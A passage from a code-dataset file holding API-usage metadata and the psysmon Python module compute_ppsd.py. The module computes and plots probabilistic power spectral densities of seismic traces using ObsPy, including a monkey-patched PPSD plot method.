"cluster_raft.raft_init.raft_obj", "line_number": 46, "usage_type": "attribute"}, {"api_name": "cluster_raft.raft_init", "line_number": 46, "usage_type": "name"}, {"api_name": "sanic.response.json", "line_number": 47, "usage_type": "call"}, {"api_name": "sanic.response", "line_number": 47, "usage_type": "name"}, {"api_name": "cluster_raft.raft_init.raft_obj.dc_election", "line_number": 55, "usage_type": "call"}, {"api_name": "cluster_raft.raft_init.raft_obj", "line_number": 55, "usage_type": "attribute"}, {"api_name": "cluster_raft.raft_init", "line_number": 55, "usage_type": "name"}, {"api_name": "sanic.response.json", "line_number": 56, "usage_type": "call"}, {"api_name": "sanic.response", "line_number": 56, "usage_type": "name"}, {"api_name": "sanic.response.json", "line_number": 65, "usage_type": "call"}, {"api_name": "sanic.response", "line_number": 65, "usage_type": "name"}, {"api_name": "cluster_raft.raft_init.raft_obj", "line_number": 66, "usage_type": "attribute"}, {"api_name": "cluster_raft.raft_init", "line_number": 66, "usage_type": "name"}, {"api_name": "cluster_raft.tools.logger.info", "line_number": 71, "usage_type": "call"}, {"api_name": "cluster_raft.tools.logger", "line_number": 71, "usage_type": "name"}, {"api_name": "cluster_raft.tools.vip_event.is_set", "line_number": 71, "usage_type": "call"}, {"api_name": "cluster_raft.tools.vip_event", "line_number": 71, "usage_type": "name"}, {"api_name": "grpc.insecure_channel", "line_number": 72, "usage_type": "call"}, {"api_name": "conf.CONFIG.get", "line_number": 72, "usage_type": "call"}, {"api_name": "conf.CONFIG", "line_number": 72, "usage_type": "name"}, {"api_name": "cluster_raft.raft_grpc_pb2_grpc.RaftServiceStub", "line_number": 73, "usage_type": "call"}, {"api_name": "cluster_raft.raft_grpc_pb2_grpc", "line_number": 73, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 79, "usage_type": "call"}, {"api_name": "time.time", "line_number": 80, "usage_type": "call"}, {"api_name": "cluster_raft.raft_grpc_pb2.GetStatusReq", "line_number": 84, "usage_type": "call"}, {"api_name": "cluster_raft.raft_grpc_pb2", "line_number": 84, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 87, "usage_type": "call"}, {"api_name": "cluster_raft.tools.logger.info", "line_number": 89, "usage_type": "call"}, {"api_name": "cluster_raft.tools.logger", "line_number": 89, "usage_type": "name"}, {"api_name": "cluster_raft.tools.vip_event.is_set", "line_number": 91, "usage_type": "call"}, {"api_name": "cluster_raft.tools.vip_event", "line_number": 91, "usage_type": "name"}, {"api_name": "cluster_raft.tools.vip_event.is_set", "line_number": 96, "usage_type": "call"}, {"api_name": "cluster_raft.tools.vip_event", "line_number": 96, "usage_type": "name"}, {"api_name": "cluster_master.utils.dc_vip.vip.set_vip", "line_number": 98, "usage_type": "call"}, {"api_name": "cluster_master.utils.dc_vip.vip", "line_number": 98, "usage_type": "attribute"}, {"api_name": "cluster_master.utils.dc_vip", "line_number": 98, "usage_type": "name"}, {"api_name": "cluster_raft.tools.vip_event.clear", "line_number": 99, "usage_type": "call"}, {"api_name": "cluster_raft.tools.vip_event", "line_number": 99, "usage_type": "name"}, {"api_name": "cluster_raft.tools.up_cluster_event.set", "line_number": 100, "usage_type": "call"}, {"api_name": "cluster_raft.tools.up_cluster_event", "line_number": 100, "usage_type": "name"}, {"api_name": "cluster_master.cluster.q1.put", "line_number": 101, "usage_type": "call"}, {"api_name": "cluster_master.cluster.q1", "line_number": 101, "usage_type": "name"}, {"api_name": "cluster_raft.tools.vip_event.is_set", "line_number": 106, "usage_type": "call"}, {"api_name": "cluster_raft.tools.vip_event", "line_number": 106, "usage_type": "name"}, {"api_name": "cluster_master.utils.dc_vip.vip.set_vip", "line_number": 108, "usage_type": "call"}, {"api_name": "cluster_master.utils.dc_vip.vip", "line_number": 108, "usage_type": "attribute"}, {"api_name": "cluster_master.utils.dc_vip", "line_number": 108, "usage_type": "name"}, {"api_name": "cluster_raft.tools.vip_event.set", "line_number": 109, "usage_type": "call"}, {"api_name": "cluster_raft.tools.vip_event", "line_number": 109, "usage_type": "name"}, {"api_name": "cluster_raft.tools.up_cluster_event.clear", "line_number": 110, "usage_type": "call"}, {"api_name": "cluster_raft.tools.up_cluster_event", "line_number": 110, "usage_type": "name"}, {"api_name": "cluster_master.cluster.q1.put", "line_number": 111, "usage_type": "call"}, {"api_name": "cluster_master.cluster.q1", "line_number": 111, "usage_type": "name"}, {"api_name": "cluster_raft.tools.logger.info", "line_number": 115, "usage_type": "call"}, {"api_name": "cluster_raft.tools.logger", "line_number": 115, "usage_type": "name"}, {"api_name": "asyncio.set_event_loop", "line_number": 124, "usage_type": "call"}, {"api_name": "asyncio.CancelledError", "line_number": 126, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 135, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 141, "usage_type": "call"}, {"api_name": "cluster_raft.tools.raft_loop.is_set", "line_number": 143, "usage_type": "call"}, {"api_name": "cluster_raft.tools.raft_loop", "line_number": 143, "usage_type": "attribute"}, {"api_name": "cluster_raft.tools", "line_number": 143, "usage_type": "name"}, {"api_name": "time.time", "line_number": 144, "usage_type": "call"}, {"api_name": "cluster_master.utils.dc_vip.vip.set_vip", "line_number": 150, "usage_type": "call"}, {"api_name": "cluster_master.utils.dc_vip.vip", "line_number": 150, "usage_type": "attribute"}, {"api_name": "cluster_master.utils.dc_vip", "line_number": 150, "usage_type": "name"}, {"api_name": "cluster_raft.tools.vip_event.set", "line_number": 151, "usage_type": "call"}, {"api_name": "cluster_raft.tools.vip_event", "line_number": 151, "usage_type": "attribute"}, {"api_name": "cluster_raft.tools", "line_number": 151, "usage_type": "name"}, {"api_name": "cluster_master.utils.dc_vip.vip.set_vip", "line_number": 154, "usage_type": "call"}, {"api_name": "cluster_master.utils.dc_vip.vip", "line_number": 154, "usage_type": "attribute"}, {"api_name": "cluster_master.utils.dc_vip", "line_number": 154, "usage_type": "name"}, {"api_name": "cluster_raft.tools.vip_event.clear", "line_number": 155, "usage_type": "call"}, {"api_name": "cluster_raft.tools.vip_event", "line_number": 155, "usage_type": "attribute"}, {"api_name": "cluster_raft.tools", "line_number": 155, "usage_type": "name"}, {"api_name": "cluster_raft.tools.get_all_nodes_from_raft_status", "line_number": 156, "usage_type": "call"}, {"api_name": "cluster_raft.tools", "line_number": 156, "usage_type": "name"}, {"api_name": "time.time", "line_number": 182, "usage_type": "call"}, {"api_name": "cluster_master.utils.dc_vip.vip.set_vip", "line_number": 185, "usage_type": "call"}, {"api_name": "cluster_master.utils.dc_vip.vip", "line_number": 185, "usage_type": "attribute"}, {"api_name": "cluster_master.utils.dc_vip", "line_number": 185, "usage_type": "name"}, {"api_name": "cluster_raft.tools.vip_event.clear", "line_number": 186, "usage_type": "call"}, {"api_name": "cluster_raft.tools.vip_event", "line_number": 186, "usage_type": "attribute"}, {"api_name": "cluster_raft.tools", "line_number": 186, "usage_type": "name"}, {"api_name": "time.time", "line_number": 187, "usage_type": "call"}, {"api_name": "time.time", "line_number": 189, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 191, "usage_type": "call"}, {"api_name": "cluster_master.utils.dc_vip.vip.set_vip", "line_number": 192, "usage_type": "call"}, {"api_name": "cluster_master.utils.dc_vip.vip", "line_number": 192, "usage_type": "attribute"}, {"api_name": "cluster_master.utils.dc_vip", "line_number": 192, "usage_type": "name"}, {"api_name": "cluster_raft.tools.vip_event.clear", "line_number": 193, "usage_type": "call"}, {"api_name": "cluster_raft.tools.vip_event", "line_number": 193, "usage_type": "attribute"}, {"api_name": "cluster_raft.tools", "line_number": 193, "usage_type": "name"}, {"api_name": "cluster_raft.tools.spawn", "line_number": 197, "usage_type": "call"}, {"api_name": "grpc.server", "line_number": 199, "usage_type": "call"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 199, "usage_type": "call"}, {"api_name": "cluster_raft.raft_grpc_pb2_grpc.add_RaftServiceServicer_to_server", "line_number": 201, "usage_type": "call"}, {"api_name": "cluster_raft.raft_grpc_pb2_grpc", "line_number": 201, "usage_type": "name"}, {"api_name": "cluster_raft.raft_grpc_server.RaftService", "line_number": 202, "usage_type": "call"}, {"api_name": "cluster_raft.raft_grpc_server", "line_number": 202, "usage_type": "name"}, {"api_name": "conf.CONFIG.get", "line_number": 206, "usage_type": "call"}, {"api_name": "conf.CONFIG", "line_number": 206, "usage_type": "name"}, {"api_name": "conf.CONFIG.get", "line_number": 213, "usage_type": "call"}, {"api_name": "conf.CONFIG", "line_number": 213, "usage_type": "name"}, {"api_name": "cluster_raft.tools.logger.info", "line_number": 216, "usage_type": "call"}, {"api_name": "cluster_raft.tools.logger", "line_number": 216, "usage_type": "name"}, {"api_name": "cluster_raft.tools.stop_thread", "line_number": 219, "usage_type": "call"}, {"api_name": "cluster_master.utils.dc_vip.vip.set_vip", "line_number": 220, "usage_type": "call"}, {"api_name": "cluster_master.utils.dc_vip.vip", "line_number": 220, "usage_type": "attribute"}, {"api_name": "cluster_master.utils.dc_vip", "line_number": 220, "usage_type": "name"}]} +{"seq_id": "73627167234", "text": "import copy\nimport os\nimport warnings\n\nimport psysmon\nimport psysmon.core.packageNodes\nimport psysmon.core.preferences_manager as psy_pm\nimport psysmon.gui.dialog.pref_listbook as psy_lb\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport obspy.core\n\nplt.style.use(psysmon.plot_style)\n\n\nclass ComputePpsdNode(psysmon.core.packageNodes.LooperCollectionChildNode):\n '''\n '''\n name = 'compute PPSD'\n mode = 'looper child'\n category = 'Frequency analysis'\n tags = ['stable', 'probability power spectral density']\n\n def __init__(self, **args):\n psysmon.core.packageNodes.LooperCollectionChildNode.__init__(self, **args)\n\n self.create_parameters_prefs()\n self.create_output_prefs()\n\n # The PPSD object.\n self.ppsd = None\n\n # The start and end times of the overall timespan used for the chunk\n # execution.\n self.overall_start_time = None\n self.overall_end_time = None\n\n\n @property\n def post_stream_length(self):\n ''' The time-span needed for correct processing prior to the start time\n of the stream passed to the execute method [s].\n '''\n ppsd_length = self.pref_manager.get_value('ppsd_length')\n overlap = self.pref_manager.get_value('ppsd_overlap')\n return ppsd_length * (overlap / 100.)\n\n\n def create_parameters_prefs(self):\n ''' Create the preference items of the parameters section.\n '''\n par_page = self.pref_manager.add_page('parameters')\n ppsd_group = par_page.add_group('ppsd')\n\n pref_item = psy_pm.FloatSpinPrefItem(name = 'ppsd_length',\n label = 'ppsd length [s]',\n value = 3600,\n limit = [0, 1e10],\n increment = 1,\n digits = 3,\n tool_tip = 'Length of data segments passed to psd [s].')\n ppsd_group.add_item(pref_item)\n\n pref_item = psy_pm.IntegerSpinPrefItem(name = 'ppsd_overlap',\n label = 'ppsd overlap [%]',\n value = 50,\n limit = [0, 99],\n tool_tip = 'Overlap of segments passed to psd [%].')\n ppsd_group.add_item(pref_item)\n\n\n def create_output_prefs(self):\n ''' Create the output preference items.\n '''\n out_page = self.pref_manager.add_page('output')\n img_group = out_page.add_group('image')\n\n item = psy_pm.FloatSpinPrefItem(name = 'img_width',\n label = 'width [cm]',\n value = 16.,\n increment = 1,\n digits = 1,\n limit = [1, 1000],\n tool_tip = 'The width of the PPSD image in cm.')\n img_group.add_item(item)\n\n item = psy_pm.FloatSpinPrefItem(name = 'img_height',\n label = 'height [cm]',\n value = 12.,\n increment = 1,\n digits = 1,\n limit = [1, 1000],\n tool_tip = 'The height of the PPSD image in cm.')\n img_group.add_item(item)\n\n item = psy_pm.IntegerSpinPrefItem(name = 'img_resolution',\n label = 'resolution [dpi]',\n value = 300.,\n limit = [1, 10000],\n tool_tip = 'The resolution of the PPSD image in dpi.')\n img_group.add_item(item)\n\n def edit(self):\n ''' Show the node edit dialog.\n '''\n dlg = psy_lb. ListbookPrefDialog(preferences = self.pref_manager)\n dlg.ShowModal()\n dlg.Destroy()\n \n\n def make_output_dir(self, base_dir):\n ''' Build the output directory.\n '''\n output_dir = os.path.join(base_dir, 'ppsd')\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n return output_dir\n\n\n def execute(self, stream, process_limits = None, origin_resource = None, **kwargs):\n '''\n '''\n start_time = process_limits[0]\n end_time = process_limits[1]\n output_dir = self.make_output_dir(base_dir = kwargs['output_dir'])\n\n self.logger.info('Processing time interval: %s to %s.', start_time.isoformat(),\n end_time.isoformat())\n\n for cur_trace in stream:\n self.logger.info('Processing trace with id %s.', cur_trace.id)\n\n self.overall_start_time = start_time\n self.overall_end_time = end_time\n\n self.initialize_ppsd(cur_trace, start_time, end_time)\n\n self.logger.info(\"Adding the trace to the ppsd.\")\n try:\n self.ppsd.add(cur_trace)\n except Exception:\n self.logger.exception(\"Error when adding the trace %s.\", cur_trace)\n self.logger.info(\"Time limits of PPSD used times: %s to %s.\", self.ppsd.current_times_used[0].isoformat(),\n self.ppsd.current_times_used[-1].isoformat())\n\n self.save_ppsd(output_dir = output_dir)\n\n\n def execute_chunked(self, chunk_count, total_chunks, stream,\n process_limits = None, origin_resource = None, **kwargs):\n '''\n '''\n start_time = process_limits[0]\n end_time = process_limits[1]\n output_dir = self.make_output_dir(base_dir = kwargs['output_dir'])\n\n self.logger.info('Processing chunk %d/%d with time interval: %s to %s.', chunk_count, total_chunks,\n start_time.isoformat(),\n end_time.isoformat())\n for cur_trace in stream:\n self.logger.info('Processing trace with id %s.', cur_trace.id)\n\n if self.ppsd is None:\n # Initialize the PPSD.\n self.initialize_ppsd(cur_trace, start_time, end_time)\n self.overall_start_time = start_time\n if chunk_count == total_chunks:\n # Don't use the data past the intended end time.\n cur_trace = cur_trace.trim(starttime = start_time,\n endtime = end_time)\n self.overall_end_time = end_time\n\n self.logger.info(\"Adding the trace to the ppsd.\")\n try:\n self.ppsd.add(cur_trace)\n self.logger.info(\"Time limits of PPSD used times: %s to %s.\", self.ppsd.current_times_used[0].isoformat(),\n self.ppsd.current_times_used[-1].isoformat())\n except Exception:\n self.logger.warning(\"No PPSD data accumulated.\")\n\n if chunk_count == total_chunks:\n self.overall_end_time = end_time\n self.save_ppsd(output_dir = output_dir)\n\n\n\n def initialize_ppsd(self, trace, start_time, end_time):\n ''' Initialize the PPSD.\n '''\n super(ComputePpsdNode, self).initialize()\n\n ppsd_length = self.pref_manager.get_value('ppsd_length')\n ppsd_overlap = self.pref_manager.get_value('ppsd_overlap') / 100.\n\n # Get the channel instance from the inventory.\n cur_channel = self.project.geometry_inventory.get_channel(station = trace.stats.station,\n name = trace.stats.channel,\n network = trace.stats.network,\n location = trace.stats.location)\n\n if len(cur_channel) == 0:\n self.logger.error(\"No channel found for trace %s. Can't initialize the PPSD object.\", trace.id)\n raise RuntimeError(\"No channel found for trace %s. Can't initialize the PPSD object.\" % trace.id)\n elif len(cur_channel) > 1:\n self.logger.error(\"Multiple channels found for trace %s; channels: %s\", trace.id, cur_channel)\n raise RuntimeError(\"Multiple channels found for trace %s; channels: %s. Can't initialize the PPSD object.\" % (trace.id, cur_channel))\n else:\n cur_channel = cur_channel[0]\n\n # Get the recorder and sensor parameters.\n rec_stream_tb = cur_channel.get_stream(start_time = start_time,\n end_time = end_time)\n\n rec_stream_param = []\n comp_param = []\n for cur_rec_stream_tb in rec_stream_tb:\n cur_rec_stream = cur_rec_stream_tb.item\n cur_rec_stream_param = cur_rec_stream.get_parameter(start_time = start_time,\n end_time = end_time)\n rec_stream_param.extend(cur_rec_stream_param)\n\n comp_tb = cur_rec_stream.get_component(start_time = start_time,\n end_time = end_time)\n for cur_comp_tb in comp_tb:\n cur_comp = cur_comp_tb.item\n cur_comp_param = cur_comp.get_parameter(start_time = start_time,\n end_time = end_time)\n comp_param.extend(cur_comp_param)\n\n if len(rec_stream_param) > 1 or len(comp_param) > 1:\n raise ValueError('There are more than one parameters for this component. This is not yet supported.')\n else:\n rec_stream_param = rec_stream_param[0]\n comp_param = comp_param[0]\n\n # Create the obspy PAZ dictionary.\n paz = {}\n paz['gain'] = comp_param.tf_normalization_factor\n #paz['sensitivity'] = old_div((rec_stream_param.gain * comp_param.sensitivity), rec_stream_param.bitweight)\n paz['sensitivity'] = 1\n paz['poles'] = comp_param.tf_poles\n paz['zeros'] = comp_param.tf_zeros\n\n # Create the ppsd instance and add the stream.\n stats = trace.stats\n\n # Monkey patch the PPSD plot method.\n obspy.signal.PPSD.plot = ppsd_plot\n\n # TODO: Make the db_bins argument user-selectable. \n # db_bins = (-200, -20, 1.)\n self.ppsd = obspy.signal.PPSD(stats,\n metadata = paz,\n ppsd_length = ppsd_length,\n overlap = ppsd_overlap)\n\n\n def save_ppsd(self, output_dir):\n '''\n '''\n ppsd_id = self.ppsd.id.replace('.', '_')\n start_string = self.overall_start_time.isoformat().replace(':', '')\n end_string = self.overall_end_time.isoformat().replace(':', '')\n\n # Add the station name and channel to the output directory.\n img_output_dir = os.path.join(output_dir,\n 'images',\n self.ppsd.station,\n self.ppsd.channel)\n if not os.path.exists(img_output_dir):\n os.makedirs(img_output_dir)\n\n data_output_dir = os.path.join(output_dir,\n 'ppsd_objects',\n self.ppsd.station,\n self.ppsd.channel)\n if not os.path.exists(data_output_dir):\n os.makedirs(data_output_dir)\n\n # Create the output filenames.\n filename = 'ppsd_%s_%s_%s.png' % (ppsd_id,\n start_string,\n end_string)\n image_filename = os.path.join(img_output_dir,\n filename)\n filename = 'ppsd_%s_%s_%s.pkl.npz' % (ppsd_id,\n end_string,\n end_string)\n npz_filename = os.path.join(data_output_dir,\n filename)\n\n # Set the viridis colomap 0 value to fully transparent white.\n cmap = plt.get_cmap('viridis')\n cmap = copy.copy(cmap)\n cmap.colors = np.array(cmap.colors)\n cmap.colors = np.hstack([cmap.colors, np.ones(cmap.N)[:, np.newaxis]])\n cmap.colors[0] = np.array([1, 1, 1, 0])\n cmap.colors = list(cmap.colors)\n\n # TODO: make the period limit user selectable\n width = self.pref_manager.get_value('img_width') / 2.54\n height = self.pref_manager.get_value('img_height') / 2.54\n dpi = self.pref_manager.get_value('img_resolution')\n fig = plt.figure(figsize = (width, height), dpi = dpi)\n try:\n fig = self.ppsd.plot(period_lim = (1/1000., 10),\n xaxis_frequency = True,\n cmap = cmap,\n show = False,\n show_coverage = True,\n fig = fig)\n except Exception:\n self.logger.error(\"Couldn't create the PPSD figure. Maybe there was no data accumulated.\")\n\n try:\n self.logger.info(\"Saving image to file %s.\", image_filename)\n if not os.path.exists(os.path.dirname(image_filename)):\n os.makedirs(os.path.dirname(image_filename))\n fig.savefig(image_filename, dpi = dpi)\n except Exception:\n self.logger.error(\"Couldn't save the PPSD.\")\n\n try:\n self.logger.info(\"Saving ppsd object to %s.\", npz_filename)\n if not os.path.exists(os.path.dirname(npz_filename)):\n os.makedirs(os.path.dirname(npz_filename))\n self.ppsd.save_npz(npz_filename)\n except Exception:\n self.logger.error(\"Couldn't save the PPSD data file.\")\n\n # Delete the figure.\n fig.clear()\n plt.close(fig)\n del fig\n\n # Clear the ppsd object.\n self.ppsd = None\n\n # Reset the chunked window limits.\n self.overall_start_time = None\n self.overall_end_time = None\n\n\n\n# A monkey patch of the obspy.signal.PPSD.plot method to deal with the problems\n# of resizing the figure.\ndef ppsd_plot(self, fig = None, filename=None, show_coverage=True, show_histogram=True,\n show_percentiles=False, percentiles=[0, 25, 50, 75, 100],\n show_noise_models=True, grid=True, show=True,\n max_percentage=None, period_lim=(0.01, 179), show_mode=False,\n show_mean=False, cmap=obspy.imaging.cm.obspy_sequential, cumulative=False,\n cumulative_number_of_colors=20, xaxis_frequency=False):\n \"\"\"\n Plot the 2D histogram of the current PPSD.\n If a filename is specified the plot is saved to this file, otherwise\n a plot window is shown.\n\n :type filename: str, optional\n :param filename: Name of output file\n :type show_coverage: bool, optional\n :param show_coverage: Enable/disable second axes with representation of\n data coverage time intervals.\n :type show_percentiles: bool, optional\n :param show_percentiles: Enable/disable plotting of approximated\n percentiles. These are calculated from the binned histogram and\n are not the exact percentiles.\n :type show_histogram: bool, optional\n :param show_histogram: Enable/disable plotting of histogram. This\n can be set ``False`` e.g. to make a plot with only percentiles\n plotted. Defaults to ``True``.\n :type percentiles: list of ints\n :param percentiles: percentiles to show if plotting of percentiles is\n selected.\n :type show_noise_models: bool, optional\n :param show_noise_models: Enable/disable plotting of noise models.\n :type grid: bool, optional\n :param grid: Enable/disable grid in histogram plot.\n :type show: bool, optional\n :param show: Enable/disable immediately showing the plot.\n :type max_percentage: float, optional\n :param max_percentage: Maximum percentage to adjust the colormap. The\n default is 30% unless ``cumulative=True``, in which case this value\n is ignored.\n :type period_lim: tuple of 2 floats, optional\n :param period_lim: Period limits to show in histogram. When setting\n ``xaxis_frequency=True``, this is expected to be frequency range in\n Hz.\n :type show_mode: bool, optional\n :param show_mode: Enable/disable plotting of mode psd values.\n :type show_mean: bool, optional\n :param show_mean: Enable/disable plotting of mean psd values.\n :type cmap: :class:`matplotlib.colors.Colormap`\n :param cmap: Colormap to use for the plot. To use the color map like in\n PQLX, [McNamara2004]_ use :const:`obspy.imaging.cm.pqlx`.\n :type cumulative: bool\n :param cumulative: Can be set to `True` to show a cumulative\n representation of the histogram, i.e. showing color coded for each\n frequency/amplitude bin at what percentage in time the value is\n not exceeded by the data (similar to the `percentile` option but\n continuously and color coded over the whole area). `max_percentage`\n is ignored when this option is specified.\n :type cumulative_number_of_colors: int\n :param cumulative_number_of_colors: Number of discrete color shades to\n use, `None` for a continuous colormap.\n :type xaxis_frequency: bool\n :param xaxis_frequency: If set to `True`, the x axis will be frequency\n in Hertz as opposed to the default of period in seconds.\n \"\"\"\n self._PPSD__check_histogram()\n if fig is None:\n fig = plt.figure()\n fig.ppsd = obspy.core.util.AttribDict()\n\n if show_coverage:\n gs = matplotlib.gridspec.GridSpec(2, 1, height_ratios=[10, 1])\n ax = fig.add_subplot(gs[0])\n ax2 = fig.add_subplot(gs[1])\n #ax = fig.add_axes([0.12, 0.3, 0.90, 0.6])\n #ax2 = fig.add_axes([0.15, 0.17, 0.7, 0.04])\n else:\n ax = fig.add_subplot(111)\n\n ax.set_axisbelow(True)\n\n if show_percentiles:\n # for every period look up the approximate place of the percentiles\n for percentile in percentiles:\n periods, percentile_values = \\\n self.get_percentile(percentile=percentile)\n if xaxis_frequency:\n xdata = 1.0 / periods\n else:\n xdata = periods\n ax.plot(xdata, percentile_values, color=\"black\", zorder=8)\n\n if show_mode:\n periods, mode_ = self.get_mode()\n if xaxis_frequency:\n xdata = 1.0 / periods\n else:\n xdata = periods\n if cmap.name == \"viridis\":\n color = \"0.8\"\n else:\n color = \"black\"\n ax.plot(xdata, mode_, color=color, zorder=9)\n\n if show_mean:\n periods, mean_ = self.get_mean()\n if xaxis_frequency:\n xdata = 1.0 / periods\n else:\n xdata = periods\n if cmap.name == \"viridis\":\n color = \"0.8\"\n else:\n color = \"black\"\n ax.plot(xdata, mean_, color=color, zorder=9)\n\n if show_noise_models:\n for periods, noise_model in (obspy.signal.spectral_estimation.get_nhnm(), obspy.signal.spectral_estimation.get_nlnm()):\n if xaxis_frequency:\n xdata = 1.0 / periods\n else:\n xdata = periods\n ax.plot(xdata, noise_model, '0.4', linewidth=2, zorder=10)\n\n if show_histogram:\n label = \"[%]\"\n if cumulative:\n label = \"non-exceedance (cumulative) [%]\"\n if max_percentage is not None:\n msg = (\"Parameter 'max_percentage' is ignored when \"\n \"'cumulative=True'.\")\n warnings.warn(msg)\n max_percentage = 100\n if cumulative_number_of_colors is not None:\n cmap = matplotlib.colors.LinearSegmentedColormap(\n name=cmap.name, segmentdata=cmap._segmentdata,\n N=cumulative_number_of_colors)\n elif max_percentage is None:\n # Set default only if cumulative is not True.\n max_percentage = 30\n\n fig.ppsd.cumulative = cumulative\n fig.ppsd.cmap = cmap\n fig.ppsd.label = label\n fig.ppsd.max_percentage = max_percentage\n fig.ppsd.grid = grid\n fig.ppsd.xaxis_frequency = xaxis_frequency\n if max_percentage is not None:\n color_limits = (0, max_percentage)\n fig.ppsd.color_limits = color_limits\n\n self._plot_histogram(fig=fig)\n fig.ppsd.quadmesh.set_zorder(5)\n\n ax.semilogx()\n if xaxis_frequency:\n xlim = [1.0 / x for x in period_lim]\n ax.set_xlabel('Frequency [Hz]')\n ax.invert_xaxis()\n else:\n xlim = period_lim\n ax.set_xlabel('Period [s]')\n ax.set_xlim(sorted(xlim))\n ax.set_ylim(self.db_bin_edges[0], self.db_bin_edges[-1])\n if self.special_handling is None:\n ax.set_ylabel('Amplitude [$m^2/s^4/Hz$] [dB]', fontsize=8)\n else:\n ax.set_ylabel('Amplitude [dB]')\n ax.xaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter(\"%g\"))\n ax.set_title(self._get_plot_title())\n\n if show_coverage:\n self._PPSD__plot_coverage(ax2)\n # emulating fig.autofmt_xdate():\n for label in ax2.get_xticklabels():\n label.set_ha(\"right\")\n label.set_rotation(30)\n\n # Catch underflow warnings due to plotting on log-scale.\n _t = np.geterr()\n np.seterr(all=\"ignore\")\n\n plt.tight_layout()\n try:\n if filename is not None:\n plt.savefig(filename)\n plt.close()\n elif show:\n plt.draw()\n plt.show()\n else:\n plt.draw()\n return fig\n finally:\n np.seterr(**_t)\n", "repo_name": "stefanmaar/psysmon", "sub_path": "lib/psysmon/packages/frequency/compute_ppsd.py", "file_name": "compute_ppsd.py", "file_ext": "py", "file_size_in_byte": 22156, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "matplotlib.pyplot.style.use", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 15, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "psysmon.plot_style", "line_number": 15, "usage_type": "attribute"}, {"api_name": "psysmon.core", "line_number": 18, "usage_type": "attribute"}, {"api_name": "psysmon.core.packageNodes.LooperCollectionChildNode.__init__", "line_number": 27, "usage_type": "call"}, {"api_name": "psysmon.core", "line_number": 27, "usage_type": "attribute"}, {"api_name": "psysmon.core.preferences_manager.FloatSpinPrefItem", "line_number": 57, "usage_type": "call"}, {"api_name": "psysmon.core.preferences_manager", "line_number": 57, "usage_type": "name"}, {"api_name": "psysmon.core.preferences_manager.IntegerSpinPrefItem", "line_number": 66, "usage_type": "call"}, {"api_name": "psysmon.core.preferences_manager", "line_number": 66, "usage_type": "name"}, {"api_name": "psysmon.core.preferences_manager.FloatSpinPrefItem", "line_number": 80, "usage_type": "call"}, {"api_name": "psysmon.core.preferences_manager", "line_number": 80, "usage_type": "name"}, {"api_name": "psysmon.core.preferences_manager.FloatSpinPrefItem", "line_number": 89, "usage_type": "call"}, {"api_name": "psysmon.core.preferences_manager", "line_number": 89, "usage_type": "name"}, {"api_name": "psysmon.core.preferences_manager.IntegerSpinPrefItem", "line_number": 98, "usage_type": "call"}, {"api_name": "psysmon.core.preferences_manager", "line_number": 98, "usage_type": "name"}, {"api_name": "psysmon.gui.dialog.pref_listbook.ListbookPrefDialog", "line_number": 108, "usage_type": "call"}, {"api_name": "psysmon.gui.dialog.pref_listbook", "line_number": 108, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path", "line_number": 116, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path", "line_number": 117, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 118, "usage_type": "call"}, {"api_name": "obspy.core.signal", "line_number": 251, "usage_type": "attribute"}, {"api_name": "obspy.core", "line_number": 251, "usage_type": "name"}, {"api_name": "obspy.core.signal.PPSD", "line_number": 255, "usage_type": "call"}, {"api_name": "obspy.core.signal", "line_number": 255, "usage_type": "attribute"}, {"api_name": "obspy.core", "line_number": 255, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 269, "usage_type": "call"}, {"api_name": "os.path", "line_number": 269, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 273, "usage_type": "call"}, {"api_name": "os.path", "line_number": 273, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 274, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 276, "usage_type": "call"}, {"api_name": "os.path", "line_number": 276, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 280, "usage_type": "call"}, {"api_name": "os.path", "line_number": 280, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 281, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 287, "usage_type": "call"}, {"api_name": "os.path", "line_number": 287, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 292, "usage_type": "call"}, {"api_name": "os.path", "line_number": 292, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.get_cmap", "line_number": 296, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 296, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 298, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 299, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 299, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 299, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 300, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 307, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 307, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 320, "usage_type": "call"}, {"api_name": "os.path", "line_number": 320, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 320, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 321, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 321, "usage_type": "call"}, {"api_name": "os.path", "line_number": 321, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 328, "usage_type": "call"}, 